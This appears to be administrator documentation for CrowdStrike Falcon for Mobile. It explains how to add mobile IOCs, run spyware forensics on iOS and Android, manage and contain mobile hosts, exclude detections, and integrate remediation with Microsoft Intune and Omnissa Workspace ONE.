Subdomains	1,706	130,583	Average of 16 characters Example: *.0123456789.com
IPv4	1,870	149,794	Maximum IPv4 address length Example: 192.51.123.456
IPv6	1,109	88,935	Maximum IPv6 address length Example: 2001:db8:1234:5678

Add mobile IOCs

Upload multiple IOCs of the same type in a file or enter IOCs manually.

Note: You can select multiple platforms for an IOC. However, if you select a mobile and a non-mobile platform, you must configure both action options — Action (for non-mobile platforms) and Mobile action (for mobile platforms).

Go to Endpoint security > Configure > IOC management .
Click the actions menu and select Add domains or Add IP addresses.
Select one of these options:
- Upload a file containing IOCs: Click Select file and open the file containing the IOCs.
- Manually add IOCs: Click Manually add domains or Manually add IP addresses. Specify the IOCs separated by commas.
For domain IOCs, configure what to match:
- To match the specified domains, select Exact match for domains added.
- To match all subdomains of the specified domains, select Any subdomains for domains added (iOS and Android). This option doesn’t include the domain itself.
- To match both the domains and all subdomains, select both options.
Optional. Enter a description.
For Platform, select Android, iOS, or both.
Select the host groups to apply the IOCs to or select All hosts.
Select the mobile action and severity.

Note: If you select No Action or Allow, no severity is needed.
Optional. Add an expiration date, tags, or audit log comments.
Click Add domains or Add IP addresses.

Forensics analysis for mobile devices

Determine if a mobile device has been compromised by spyware such as Pegasus or Chrysaor by using Falcon for Mobile to analyze an on-demand diagnostic report.

This feature supplements Falcon for Mobile's OS integrity checks and spyware blocking. The analysis provides lower system-level visibility to deliver forensics insights into malicious or abnormal behaviors.

End users initiate forensic analysis on their devices by generating a diagnostic report through the OS. The report generation typically finishes in 1 or 2 minutes but can take up to 10 minutes. Users then submit the report to the CrowdStrike Falcon app to complete the analysis. If an IOC is identified, the sensor generates a detection.

Perform analysis on iOS devices

Generate the diagnostic report and perform analysis on iOS devices.

Open the CrowdStrike Falcon app.
Tap Forensics, and then tap Start new forensic analysis.
Follow the on-screen instructions to generate the diagnostic report, which varies depending on your device model.

When the report completes, the Forensic Analysis page appears and the file name of the report is automatically copied to the clipboard.
On the Forensic Analysis page, tap Browse logs in Settings.
Swipe through the list to reveal the search bar.
Paste the auto-copied file name in the search field.
Tap the file that appears.
Tap the upload icon, and then tap the CrowdStrike Falcon app.

The Forensic Analysis page shows if malicious indicators were found.

Perform analysis on Android devices

Generate the diagnostic report and perform analysis on Android devices.

Note: The analysis steps include temporarily enabling developer options. This won't generate a false positive detection.

Open the CrowdStrike Falcon app.
Tap the navigation menu ( ), and then tap Forensics.
Tap Start new forensic analysis.
Enable developer options.
1. Tap Open settings.
2. Tap Build number multiple times until you receive a notification that developer options have been enabled.
3. Go back to the CrowdStrike app and tap Next.
Generate and analyze the diagnostic report.
1. Tap Open settings.
2. On the Developer options page, tap Bug Report, and then select Full Report.
3. After the report completes, tap the bug icon that appears in the notification bar, and then tap the report.
  
  Note: If you have silent notifications configured, the bug icon might not appear in the notification bar. You must manually access the notification center to tap the report.
4. Tap CrowdStrike Forensics to share the report with the CrowdStrike Falcon app.
  
  After sharing the file, the Forensics page appears. This page displays the forensic analysis progress and, once complete, shows if any malicious indicators are found
Disable developer options.
1. Tap Open Settings.
2. On the Developer options page, disable Use Developer options.
3. Go back to the CrowdStrike app and tap Done.

Managing mobile hosts

Mobile hosts are available in Host setup and management > Manage endpoints > Host management . Mobile devices become hosts when they have the CrowdStrike Falcon app installed and enrollment to Falcon for Mobile is complete.

For more info about host management, see Host and Host Group Management.

Viewing mobile host details

To see a summary panel of basic info about a mobile host, including which mobile policy and host groups it belongs to, click its row in Host Management.

You can view more details about the host by clicking Mobile details ( ) in the summary panel or by clicking a mobile host’s Agent ID listed on the Mobile host dashboard. The details page for a mobile host shows device security status, assigned policy, detection statistics, and more.

The mobile host details page for an iOS device

Note: When viewing the summary panel for a mobile host on the Host management page, the serial number appears as ---. This is because Android and iOS restrict an app’s ability to read the serial number of a device.

Zero Trust Assessment for mobile hosts

Zero Trust Assessment (ZTA) monitors OS and sensor settings to produce a score that measures the security posture of your hosts, including mobile hosts. For more info, see Zero Trust Assessment.

You can create Falcon Fusion SOAR workflows based on ZTA scores or on failed assessments for mobile hosts. For more info, see Configuring Falcon Fusion SOAR workflows for Falcon for Mobile.

Network containment for mobile hosts

If you suspect a mobile host has been compromised, you can network contain the host to isolate it from network activity.

You can manually contain a host in Host Management from the host’s summary panel. You can also lift containment to restore connectivity to hosts. If you want to allow specific connections when a host is manually contained, you can add allowed IP addresses to your containment policy. For more info about network containment and containment policies, see Network Containment.

Note: Allowlisting proxy IP addresses isn't supported. When a proxy is used, the sensor sees traffic being sent to the proxy rather than the destination IP address, so the sensor can’t block specific IPs addresses. Allowlisting the proxy IP address would allow all proxied traffic during containment.

You can also automatically contain mobile hosts if a man-in-the-middle attack is detected. For more info, see Automatic network containment.

Note: The network connections that the sensor can block depend on your deployment and configuration method. For more info, see Network protection.

Important: If you use FalconID for multi-factor authentication, be aware that FalconID is disabled during network containment. Users can’t authenticate with FalconID until containment is lifted.

Deleting a mobile host

Use caution if you delete mobile hosts. Deleting a mobile host works differently than deleting a traditional Falcon sensor host.

When you delete a Windows, Mac, or Linux host, it is moved to the Host setup and management > Manage endpoints > Host management page, but remains active if it is still sending events.

By contrast, when you delete a mobile host:

It is truly deleted, and will not remain active or appear on the Host setup and management > Manage endpoints > Host management page where it could be restored. If a mobile host is accidentally deleted, a new invite needs to be sent to the associated user so they can re-enroll.
All data associated with the CrowdStrike Falcon app is removed.
Any shielded Android apps that were added by Falcon are removed, along with all their associated data. Unprotected instances of the apps are not affected.
If there was a per-app VPN profile applied to the unsupervised iOS device, it remains in effect - cutting off data flow for the monitored corporate apps. You might need to apply a different profile to the device to restore internet connectivity to the corporate apps.

For more info about deleting hosts, see Managing inactive and duplicate hosts.

Viewing mobile detections and events

Detections

View detections from mobile hosts in Endpoint security > Monitor > Mobile detections . For more info, see Working through mobile detections.

Note: Mobile detections appear in the Falcon console for 90 days after they're generated. After 90 days, mobile detections aren’t guaranteed to be retained.

You can create Falcon Fusion SOAR workflows or scheduled searches that send notifications when mobile detections are generated. For info about workflows, see Configuring Falcon Fusion SOAR workflows for Falcon for Mobile. For info about scheduled searches, see Scheduled Searches.

There are several ways in which you can generate test detections. For more info, see Falcon for Mobile: Triggering Detections. For US-GOV-1 and US-GOV-2 customers, see Falcon for Mobile: Triggering Detections.

Important: When a detection or prevention is triggered for an IOC, CrowdStrike recommends reviewing the host for events that may show additional context. Events can occur both before and after the detection that may suggest related adversary activity, such as credential access, lateral movement, data exfiltration, or file encryption. Adversaries often attempt to perform many activities on a host, so CrowdStrike recommends that your organization perform additional review and risk mitigation when detections and preventions occur.

Events

You can view mobile events in Falcon from Investigate > Search > Advanced event search .

Mobile detection events are also available through the event streams APIs. You can use the APIs to collect these mobile events directly or you can configure the Falcon SIEM connector to send events to your SIEM. For more info, see Event Streams APIs or SIEM Connector.

Find details about mobile events in Events Full Reference (Events Data Dictionary).

Excluding mobile detections

Create exclusions to prevent specific mobile detections from appearing in the Falcon console. This reduces detection fatigue and helps you focus on the mobile detections that are most relevant to your environment.

For example, your organization might allow sideloading of approved Android apps, which you don’t want generating detections. You also might not want to see detections when an iOS device’s lock screen isn’t set. You can create exclusions to filter out these detections.

Note: Mobile detections exclusions are not supported in US-GOV-1.

Mobile detection exclusions in multi-CID environments

Mobile detection exclusions that are created in a parent CID are applied to the parent CID and all the child CIDs. You can create these exclusions from detections generated within the parent CID or from aggregated detections. Aggregated detections appear in the parent CID based on your configuration and include detections across child CIDs.

You can delete inherited exclusions in a child CID if they’re not needed. If you need to add the exclusion back, you can do so locally in the child CID. You can also remove and then re-add the exclusion from the parent CID, however, this would propagate the exclusion to any other child CIDs that might have locally removed the original inherited exclusion.

Exclusions that are created in a child CID don’t appear in the parent CID and are fully managed in the child CID. Local exclusions take precedence over globally inherited exclusions.

Considerations for mobile detection exclusions

Exclusions are created from existing detections and apply to all Falcon for Mobile hosts. When creating the exclusion, the parameters of the exclusion appear, such as the platform and detection type. These parameters can’t be modified.
If you configure an exclusion for a specific IP address or domain, that exclusion applies regardless of the severity or how the detection was triggered. However, as with other exclusions, IP address and domain exclusions are platform-specific.
An exclusion for a connection takes precedence over any policy, such as network preventions or custom IOCs, that would block the connection and trigger a detection. For example, if you create an exclusion for a particular IP address that was blocked by the Block malicious network connections policy toggle, that connection is now allowed and new detections won't appear in the Falcon console.
Mobile detection exclusions support only sensor-based detections, and not cloud-based detections. This means you can’t exclude hash-based or Play Integrity attestation detections.
If you configure an exclusion for the RootAccessDetected detection on Android devices, the following detections are automatically excluded. Likewise, if all of these detections are individually excluded, the RootAccessDetected detection is automatically excluded.
- SuspiciousAppFound
- SuspiciousAndroidActivityFound
- SuspiciousAndroidSystemPropertyFound
- SuspiciousAndroidLogcatMessageFound
- UnexpectedFileFound
- HookedAndroidMethodFound
If you configure an exclusion for the iOSSecurityCompromised detection for jailbroken iOS devices, the following detections are automatically excluded. Likewise, if all of these detections are individually excluded, the iOSSecurityCompromised detection is automatically excluded.
- SystemPartitionAltered
- TrampolineDetected
- ObjCRuntimeAltered
- CertificatePinningCompromised
- UnexpectedFileFound
- UnexpectedDynamicLibraryLoaded
- CodeSigningAltered
- PathUnexpectedlyReadable
- UnexpectedEnvironmentVariable

Create mobile detection exclusions

Create an exclusion for detections you no longer want to see.

Go to Endpoint security > Monitor > Mobile detections .
Use the Search bar or filter menus to find the detection to exclude, and then click the detection.
In the summary panel, click Add exclusion.
Click Add exclusion.

Delete mobile detection exclusions

If you need to see a detection that was excluded, you can delete the exclusion.

Go to Endpoint security > Monitor > Mobile detections .
Use the Search bar or filter menus to find the detection you want to see again, and then click the detection.
In the summary panel, click Remove exclusion.
Click Remove exclusion.

Viewing mobile dashboards

Falcon for Mobile offers these predefined dashboards to monitor protected devices in your environment:

The Mobile hosts dashboard provides statistics about your mobile hosts, including platform, OS version, and device models.
The Jailbroken or rooted devices dashboard shows iOS devices that are jailbroken and Android devices that are rooted.
The VPN status dashboard shows the status of the CrowdStrike VPN on Android devices.

You can also create and customize your own dashboards from the Dashboards page to include relevant widgets. Although you can’t modify any of the predefined Falcon for Mobile dashboards directly, you can duplicate a dashboard and then add or remove widgets. For more info about creating, duplicating, and modifying dashboards, see Customizable Dashboards.

Mobile device trust with Falcon Identity Protection

If you use Falcon Identity Protection, you can create conditional access policy rules for Android and iOS devices based on whether Falcon for Mobile is installed. Validating that mobile devices are protected by Falcon for Mobile helps ensure that these devices are trusted in your environment and should be granted access to company resources.

How mobile device trust works

Identity Protection uses the Falcon installed rule condition to determine if Falcon for Mobile is installed on authenticating mobile devices. Use the following steps to understand the overall configuration and workflow for mobile device trust.

Configure your OIDC integration with Identity Protection. For more info, see OIDC integrations.
Configure your Identity Protection policy rules using the following settings. For more info about Identity Protection policy rules, including creating and managing rules and details about specific settings, see Identity Protection Policy.
1. For the rule trigger, select Cloud access. Cloud access is the only trigger that’s supported for the Falcon installed condition when used with mobile devices.
2. For the rule condition, configure the Source attribute to include or exclude Falcon installed.
3. For the rule action, select Audit, Block, or Identity Verification.
  
  For example, to block mobile devices that don’t have Falcon for Mobile installed, exclude the Falcon installed condition and set the rule action to Block.
When a mobile user authenticates using the Identity Protection OIDC integration, the rule is applied. If the user’s mobile device is protected by Falcon for Mobile, the CrowdStrike Falcon app briefly opens with a message that the device is trusted or indicates failure if there was a problem validating the Falcon sensor installation. Depending on how the rule is configured, the user can be allowed access, blocked, or asked for additional identity verification.

Note: There are some limitations with how the Falcon sensor installation can be validated. For more info, see Limitations with mobile device trust authentication.

Configuring Falcon Fusion SOAR workflows for Falcon for Mobile

Use Fusion SOAR to define workflows that Falcon performs when specific criteria are met. These workflows can trigger based on mobile detections or Zero Trust Assessment (ZTA).

For example, your workflows could complete steps such as these:

Assign a user to all critical Android detections.
Create a ServiceNow ticket for threats that need to be escalated, such as detections associated with a particular tactic or technique.
Assign a particular Falcon grouping tag to mobile hosts that fail specific ZTA OS assessments.
Send a notification email to a distribution list if an iOS host's sensor assessment score drops below a certain number.

Note: Detection-based workflows only trigger for detections that are generated after creating the workflow. For example, you’ve created a workflow to send a notification if an Android device is rooted. However, Falcon for Mobile has detected a rooted device before you created the workflow. Because rooted detections occur once, the workflow won’t trigger for that device.

For more info about managing workflows, see Fusion SOAR.

Create a workflow

Create a workflow for mobile detections.

Go to Fusion SOAR > Fusion SOAR > Workflows .
Click Create workflow.
Select Create workflow from scratch and click Next.
Configure the trigger.
1. In the Add trigger panel, search for mobile detection and then expand Endpoint security.
2. Click Detection > Mobile Detection.
3. Click Next.
Configure the condition.
1. In the Add next panel or on the workflow canvas, select Condition .
2. Configure the parameter, operator, and value. For example, to set a workflow for Android detections, select the Parameter as Platform, the Operator as is equal to, and the Value as Android.
3. Click Next. Configure additional conditions as needed.
4. Click Next.
Configure the sequential action.
1. In the Add next panel or on the workflow canvas, select Action .
2. Configure the action. For example, to assign detections to a user, search for assign detection, click Assign detection to user and select the user.
3. Click Next.
  
  The workflow appears on the canvas. For example:
Click Save and exit.
If you’d like the workflow to start immediately, set Status to On.
Enter a name and optional description or output for the workflow.
Click Save and exit.

Collecting application logs for troubleshooting

Application logs for Android and iOS contain important sensor events and errors to aid in troubleshooting issues with Falcon for Mobile. These logs contain messages only from the Falcon app and are separate from any system logs. Application logs rotate on a regular basis.

You can allow CrowdStrike to remotely collect application logs with the Allow remote log collection option in your mobile policies. This option is enabled by default. If a mobile device is unable to connect to the CrowdStrike cloud, you can also collect the logs locally on the device.

Enable or disable remote log collection

By default, CrowdStrike is able to remotely collect application logs from your mobile devices. You can enable or disable remote log collection on a per-policy basis.

Go to Endpoint security > Configure > Mobile policies .
Find the policy to configure and click Edit Policy.
On the Sensor settings tab, enable or disable Allow remote log collection.

Manually share application logs from mobile devices

If a mobile device is unable to connect to the CrowdStrike cloud, you can share application logs locally using the Falcon app. You can also check the connectivity status to the CrowdStrike cloud.

From the mobile device, open the CrowdStrike Falcon app.
Open the diagnostic menu.
- Android devices: Open the menu in the upper left corner and select Diagnostics.
- iOS devices: Open the menu in the upper right corner and select Diagnostics.
Tap Share Debug Logs.
The Android or iOS share sheet opens.
Select an app, action, or contact, then use that method to share the application logs.

Integrating Falcon for Mobile with Microsoft Intune for Remediation Actions

Expand the capabilities of Falcon for Mobile by integrating with Microsoft Intune (formerly Endpoint Manager).

Overview

Expand the capabilities of Falcon for Mobile with Microsoft Intune (formerly Endpoint Manager). This integration gives you greater flexibility and control over how Falcon for Mobile responds to potential threats by performing remediation actions or sending notifications to user's devices.

For example, if a user enables developer options on an Android device, you might want Falcon for Mobile to simply generate a detection for this low-severity event. If the user then goes on to gain root access to the device, Falcon for Mobile can generate a higher severity detection and notify Intune to take action, such as remotely locking the device.

Note: Falcon for Mobile supports integrating with only one MDM at a time. Do not configure both Intune and Omnissa Workspace ONE for remediation actions as this will result in unexpected behavior.

Integration data flow

The illustration describes the high-level communication and data flow that takes place for this integration.

A workflow image showing the communication and data flow for this integration

The CrowdStrike Falcon app runs on mobile devices and generates events that are sent to the Falcon cloud for processing.
If Falcon finds a detection on a device, and that detection matches a configured remediation trigger, Falcon notifies Intune.
Intune performs the configured noncompliance action, such as sending a notification to the user or remotely locking the device.

Requirements

Subscription: Falcon for Mobile

Default roles:

To configure Falcon for Mobile in the Falcon console:
- Falcon Administrator
- Mobile admin
To set up Mobile Device Management integrations in the Falcon Store:
- Falcon Administrator

CrowdStrike clouds: Available in US-1, US-2, and EU-1

Before you begin

Before you configure this integration, make sure you deploy Falcon for Mobile to your devices. This includes creating a device group in Intune, pushing the CrowdStrike Falcon app to devices, and enrolling devices to the Falcon cloud. For iOS devices, you must also deploy a configuration profile and use zero-touch enrollment instead of manual enrollment.

For Android devices, see Deploying Falcon for Mobile to Android Devices.
For iOS devices:
- See Deploying Falcon for Mobile to iOS Devices for general deployment instructions.
- See Configuring Falcon for Mobile for iOS devices with Microsoft Intune. For US-GOV-1 and US-GOV-2 customers, see Configuring Falcon for Mobile for iOS devices with Microsoft Intune for configuring the Content Filter or Per-App VPN profile.

Configuration overview

These high-level steps describe the general process to set up and configure this integration.

Set up the integration and perform the initial configuration in Intune.
1. Configure the Mobile Threat Defense connector, which allows Intune to connect to the Falcon cloud.
2. Create a compliance policy. When a detection is generated that matches a remediation trigger, Intune applies any configured actions specified in the compliance policy.
3. Configure the MDM device ID, which ensures that Falcon for Mobile and Intune are correctly identifying unique mobile devices.
Complete the integration in the Falcon console. Use the CrowdStrike Store to connect Falcon to Intune and enable remediation for your mobile policies.
Configure remediation triggers on a per-mobile policy basis. If a mobile device generates a detection with a configured remediation trigger, Falcon notifies Intune.

Set up Intune

Set up the integration and perform the initial configuration in Intune.

Configure the Mobile Threat Defense connector

Configure the Mobile Threat Defense connector, which allows Intune to connect to Falcon.

In Intune, go to Tenant administration > Connectors and tokens > Mobile Threat Defense.
Click Add.
From the connector menu, select CrowdStrike Falcon for Mobile.
- The connector settings are enabled for Android and iOS devices by default. You can disable these settings at any time if needed.
- You can ignore the App Sync settings as they aren’t used in this integration.
- The connector deactivates if there is no response from CrowdStrike in 7 days by default. You can modify this setting at any time.
Click Create.

Understanding compliance policies

Intune uses compliance policies to determine what action is taken when a device is determined to be noncompliant.

Consider these points when creating your compliance policies:

A compliance policy applies to only one device platform. If you are protecting both Android and iOS devices, you need to create a compliance policy for each.
The Device Threat Level determines the threshold for noncompliance. This threat level corresponds to the severities that are configured in the remediation triggers in the Falcon console. For more info, see the Microsoft article Create Mobile Threat Defense device compliance policy with Intune.

Create a compliance policy

Create a compliance policy and configure which actions to take if a device is noncompliant.

In Intune, go to Devices > Compliance.
Click Create Policy.
Configure basic settings.
1. Select the platform.
2. If the policy is for Android Enterprise, select the profile type.
3. Click Create.
4. Enter a name and optional description, and then click Next.
On the Compliance Settings tab, configure device health settings.
1. Expand Device Health.
2. For Require the device to be at or under the Device Threat Level, select a threat level.
3. Click Next.
On the Actions for noncompliance tab, configure the actions to take when a device is no longer compliant.
1. If you don’t want the device immediately marked as noncompliant, click Immediately and enter the time, in days, when the action will take effect.
2. Click the Action menu and select the action to take after a device is noncompliant.
3. If you don’t want the action to immediately take effect, schedule the time in days to take effect.
4. If you’re sending an email to the end user, click the links that appear in the Message template and Additional recipients columns to configure the email message and recipients.
5. Click Next.
In the Assignments tab, add the groups that contain the devices protected by Falcon for Mobile.
Click Next.
Click Create.

Configure the MDM device ID

This integration uses Microsoft Entra device IDs to uniquely identify devices between Falcon and Intune. This ID is specified as a dynamic variable in the configuration that Intune deploys to devices.

If you already configured the MDM device ID during your deployment of Falcon for Mobile, you can skip this step. Go to Connect Falcon to Intune.

Tip: Although you don’t need to know the individual IDs of your devices to complete this integration, you can view a device’s ID in the host’s details panel in Host Management. MDM Device ID displays the ID.

Configure the MDM device ID for Android devices

Use an app configuration policy to configure the device ID. This process varies depending on how you enroll Android devices to Falcon for Mobile.

Configure the MDM device ID for zero-touch enrollment

If you enrolled Android devices using zero-touch enrollment, add the MDM device ID to the app configuration policy that was created for enrollment.

In Intune, go to Apps > App configuration policies.
Open the app configuration policy that was created for enrollment.
Click Properties.
In the Settings area, click Edit.
In the Configuration settings area, click +Add.
Select MDM device ID.
Click OK.
In the Configuration value field, enter: {{aaddeviceid}}
Click Review + Save.
Click Save.

Configure the MDM device ID for manual enrollment

If you manually enrolled Android devices to Falcon for Mobile using QR codes, add the MDM device ID to a new app configuration policy.

In Intune, go to Apps > App configuration policies.
Click Add > Managed devices.
Configure basic settings.
1. Enter a name and optional description.
2. For the platform, select Android Enterprise.
3. Select the profile type.
4. Click Select app.
5. In the Associated app area, select CrowdStrike Falcon.
6. Click OK.
7. Click Next.
In the Settings tab, configure the MDM device ID.
1. For Configuration settings format, select Use configuration designer.
2. Click +Add.
3. Select MDM device ID.
4. Click OK.
5. In the Configuration value text field, enter: {{aaddeviceid}}
6. Click Next.
In the Assignments tab, add the groups that contain the devices protected by Falcon for Mobile.
Click Next.
Click Create.

Configure the MDM device ID for iOS devices

Add the MDM device ID to the configuration profile you used to deploy Falcon for Mobile to devices. Depending on your deployment, this would be either a Content Filter profile or a Per-App VPN profile.

Configure the MDM device ID for a Content Filter profile

Because Intune doesn’t natively support Content Filter profiles, you can’t directly edit the contents of an imported Content Filter profile. Use the Falcon console to create and export a new profile that you can import to Intune.

Tip: Although using the Falcon console to export a profile is the recommended method, you can also use Apple Configurator 2. For more info, see Create a Content Filter profile with Apple Configurator 2 of the iOS deployment guide.

In the Falcon console, go to Host setup and management > Deploy > Mobile enrollment .
Click Enroll managed devices.
Follow the on-screen instructions to configure and download the profile for iOS devices.
- The MDM device ID is automatically configured when you select Microsoft Intune as your MDM.
- For full instructions on configuring these settings, see Configure the profile in the Falcon console.
In Intune, go to Devices > Configuration.
Open the policy you used to deploy the Content Filter profile to iOS devices.
Next to Configuration settings, click Edit.
In the Configuration settings tab, click Select a configuration profile file.
Select the configuration file you exported.
Click Review + save.
Click Save.

Configure the MDM device ID for a Per-App VPN profile

The MDM device ID must be specified as a dynamic value, but due to a limitation with Microsoft, Intune doesn’t support dynamic values in custom data settings for Per-App VPN profiles.

You can work around this by overriding the Per-App VPN profile and applying an app configuration policy to protected iOS devices.

Note: This workaround requires users to open the Falcon app on their devices after changes are applied.

Add the MDM device ID to the Per-App VPN profile.
1. In Intune, go to Devices > Configuration.
2. Open the Per-App VPN profile used to deploy Falcon for Mobile.
3. Next to Configuration settings, click Edit.
4. Expand Base VPN.
5. Configure the override setting. If you already did this to configure dynamic values for the hostname or user_email settings during deployment, you can skip this step.
  - In the Key field, enter: allow_app_config_overrides
  - In the Value field, enter: true
6. Configure the MDM device ID.
  - In the Key field, enter: mdm_device_id
  - In the Value field, enter: {{aaddeviceid}}
7. Click Review + save, and then click Save.
Go to Apps > App Configuration Policies.
If you already created an app configuration policy for overriding the hostname or user_email settings, open the policy for editing.
1. Click the name of the policy.
2. In the Manage area, click Properties.
3. Next to Settings, click Edit.
If you didn’t create an app configuration policy during deployment, create one.
1. Click Add > Managed devices.
2. Configure these settings:
  - Name: A name for the policy
  - Platform: iOS/iPadOS
  - Targeted app: CrowdStrike Falcon
3. Click Next.
4. From the Configuration settings format menu, select Use configuration designer.
Add the MDM device ID to the app configuration policy.
1. In the Configuration key field, enter: mdm_device_id
2. Select String as the Value type.
3. In the Configuration value field, enter: {{aaddeviceid}}
Save your changes.
- If you’re creating a new policy, click Next, add the groups containing Falcon for Mobile devices, and create the policy.
- If you’re editing a policy, click Review + save, and then click Save.

Connect Falcon to Intune

Enable the integration in the CrowdStrike Store and set up remediation triggers.

In the Falcon console, go to Endpoint security > Configure > Mobile policies .
Click Connect an MDM.

The CrowdStrike Store opens.
In the CrowdStrike Store, in the Mobile Device Management area, click Falcon for Mobile built for Microsoft Intune.
Click Configure, and then click Save configuration.
When prompted by Microsoft, select your Intune admin account.
- This account should have the home tenant set to the tenant where the CrowdStrike Mobile Threat Defense connector was activated.
- This account should have the Global Administrator role assigned, which is required in order to consent to the permissions necessary for this integration.
Click Accept.
In Falcon, click Manage Mobile Policies or go to Endpoint security > Configure > Mobile policies .
In the MDM remediation setup dialog, select your Intune Tenant ID.
Click Save settings.

The Mobile policies page shows that the MDM is connected and remediation triggers are enabled.

Configure remediation triggers in Falcon

When a detection on a mobile device is found, Falcon checks to see if the detection has an associated remediation trigger. If the detection matches an active trigger, Falcon notifies Intune.

After completing remediation setup, triggers are enabled in all mobile policies. You can configure and disable individual triggers on a per-mobile policy basis.

For more info about configuring and managing mobile policies, see Managing mobile policies.

Remediation trigger considerations

Consider these points when configuring remediation triggers.

Any new triggers added by Crowdstrike in future releases will not be enabled by default and must be enabled manually in mobile policies.
To use the DebuggableFlagTurnedOn remediation trigger for Android devices, you must also enable the Currently installed apps setting in your mobile policy. For more info, see Access to sensitive data types.

Severity mapping for remediation triggers

A remediation trigger’s severity corresponds with the Device Threat Level defined in the compliance policy in Intune. This mapping isn’t completely one-to-one.

CrowdStrike remediation trigger severity	Device Threat Level mapping in Intune
Low	Low
Medium	Medium
High	High
Critical	High

Configure remediation triggers

After completing remediation setup, remediation triggers are enabled in all policies with a default configuration. You can disable individual triggers and modify trigger severity on a per-mobile policy basis.

In the Falcon console, go to Endpoint security > Configure > Mobile policies .
Find the policy to configure and click Edit Policy.

Tip: You can also create a policy instead of modifying an existing one. For more info, see Create a mobile policy.
Click the Remediations tab.
Click the trigger you want to modify.
In the Details panel, click Edit remediation trigger and perform any of these actions:
- To enable or disable the trigger, click the Status toggle.
- To modify the severity, use the Severity menu.
- To reset the trigger to the default severity, click Reset to default.
Click Update Setting.

View non-compliant devices in Intune

If Intune determines a device is noncompliant due to a remediation trigger, the device is marked as such in the device list.

Note: It can take several minutes for compliance changes to take effect.

In Intune, go to Devices > All devices.
Click the Compliance column to sort the list by device compliance.
Click a device name, and then click Device compliance to view more details about the device’s compliance status.

View detections in the Falcon console

All Falcon for Mobile detections, including detections associated with remediation triggers, appear in Endpoint security > Monitor > Mobile detections .

Manage the Intune integration

Modify connector settings or disable or remove the integration.

View the connector status or modify connector settings in Intune

You can view the status of the Mobile Threat Defense connector used to connect to Falcon. You can also modify connector settings, such as the response timeout or the compliance evaluation status for a specific platform.

In Intune, go to Tenant administration > Connectors and tokens > Mobile Threat Defense.

The connector list shows the status of the CrowdStrike Falcon for Mobile connector.
Click the CrowdStrike connector.
Modify settings as needed. The App Sync settings aren’t used and can be ignored.
Click Save.

Disable the integration

If you want to disable the integration with Intune without completely removing it, you can do so in the Falcon console.

There are two options for disabling the integration.

Stop sending new remediation triggers to Intune. Intune will continue to apply policy to devices that are already marked as noncompliant.
Stop sending remediation triggers and disable the connector in Intune. Any devices that were marked as noncompliant as a result of this integration will reset in Intune and become compliant again.

Go to Endpoint security > Configure > Mobile policies .
Click Remediation triggers enabled.
Disable Send remediation triggers to MDM.
If you want to disable the connector, select Disable CrowdStrike connector in Microsoft Intune.
Click Save settings.

Delete the integration

If you no longer want to integrate Falcon for Mobile with Intune, you can completely delete the integration in the Falcon console. Any devices that were marked as noncompliant as a result of this integration will reset in Intune and become compliant again. This also disables remediation triggers in your mobile policies.

Go to Endpoint security > Configure > Mobile policies .
Click MDM connected.
Click Delete settings.

Integrating Falcon for Mobile with Omnissa Workspace ONE for Remediation Actions

Expand the capabilities of Falcon for Mobile by integrating with Omnissa Workspace ONE.

Overview

Expand the capabilities of Falcon for Mobile with Omnissa Workspace ONE. With this integration, you have greater flexibility and control over how Falcon Mobile responds to threats. You can perform remediation actions or send notifications when a detection is triggered.

For example, if Falcon for Mobile detects that a user has turned on developer options on an Android device, you can configure Workspace ONE to merely send a notification about this low-severity action. If the user then gains root access to the device, Falcon for Mobile can generate a higher severity detection, alerting Workspace ONE to apply restrictions to the device, such as preventing outgoing calls or SMS messages.

Note: Falcon for Mobile supports integrating with only one MDM at a time. Do not configure both Workspace ONE and Microsoft Intune for remediation actions as this will result in unexpected behavior.

Integration data flow

This illustration describes the high-level communication and data flow that takes place for this integration.

An illustration showing the communication and data flow for this integration

The CrowdStrike Falcon app runs on mobile devices and generates events that are sent to Falcon.
If Falcon finds a detection on a device, and that detection matches a configured remediation trigger, Falcon alerts Workspace ONE.
Workspace ONE performs remediation actions, such as sending an email notification, wiping the device, or applying a more restrictive policy to the device.

Requirements

Subscription: Falcon for Mobile

Default roles:

To configure Falcon for Mobile in the Falcon console:
- Falcon Administrator
- Mobile admin
To set up Mobile Device Management integrations in the Falcon Store:
- Falcon Administrator

CrowdStrike clouds: Available in US-1, US-2, and EU-1

Before you begin

Deploy Falcon for Mobile and select the organization group to use in Workspace ONE.

Deploying Falcon for Mobile

Before you configure this integration, you must deploy Falcon for Mobile to your devices. This deployment includes pushing the CrowdStrike Falcon app to devices from Workspace ONE and enrolling devices to the Falcon cloud. The enrollment process depends on your device type.

For Android devices, you can manually enroll users or configure zero-touch enrollment.
For iOS devices, you must deploy a profile that contains configuration for zero-touch enrollment. We recommend using the Enroll managed devices workflow in the Falcon console to create the profile.

For more info, see:

Deploying Falcon for Mobile to Android Devices
Deploying Falcon for Mobile to iOS Devices

Selecting the Workspace ONE organization group

The setup for this integration requires selecting an organization group in Workspace ONE. Workspace ONE uses organization groups to create a structured hierarchy for devices in your environment. Every device managed by Workspace ONE belongs to one, and only one, organization group.

If your environment contains only one organization group, select this group when setting up the integration. If you have multiple organization groups, you must select a group that has no children. Selecting a parent node isn’t supported and could cause unexpected behavior with the integration.

If you have a multi-CID environment and you’re configuring this integration for more than one CID, you must select organization groups at the same hierarchy level. We do not recommend using the same organization group for multiple CIDs.

For more info about how Workspace ONE uses organizations, see the Omnissa documentation for Organization groups.

Configuration overview

Step 1: Connect Falcon to Workspace ONE

Step 1a: Configure the device UID in Workspace ONE

Step 1b: Configure authentication settings in Workspace ONE

Step 1c: Configure the integration in the Falcon console

Step 2: Configure remediation triggers in Falcon

Step 3: Configure remediation actions in Workspace ONE

Step 1: Connect Falcon to Workspace ONE

Configure the device unique identifier (UID) and authentication settings in Workspace ONE and provide connection information in the Falcon console.

Step 1a: Configure the device UID in Workspace ONE

This integration uses a device’s UID, specified as a dynamic value, to uniquely identify devices between Falcon and Workspace ONE.

For Android devices and iOS devices with a manually configured Content Filter or Per-App VPN profile, you must configure the UID in Workspace ONE.

If you used the Falcon console to create a custom profile type for Workspace ONE, you can skip this step. The UID configuration is included in the custom profile.

Tip: Although you don’t need to know the individual UIDs of your devices to complete this integration, you can view a device’s UID in the host’s summary panel on the Host Management page. MDM Device ID displays the UID.

Configure the device UID for Android devices

Use AppConfig to configure the device UID. If you used zero-touch enrollment, add the device UID to the assignment where you configured the key-value pairs. If you manually enrolled devices, create a new assignment.

In Workspace ONE, go to Resources > Apps > Native.
In the List View area, click the Public tab, and then click the Android entry for CrowdStrike Falcon.
Click Assign.
Add or modify an assignment to configure the device UID.
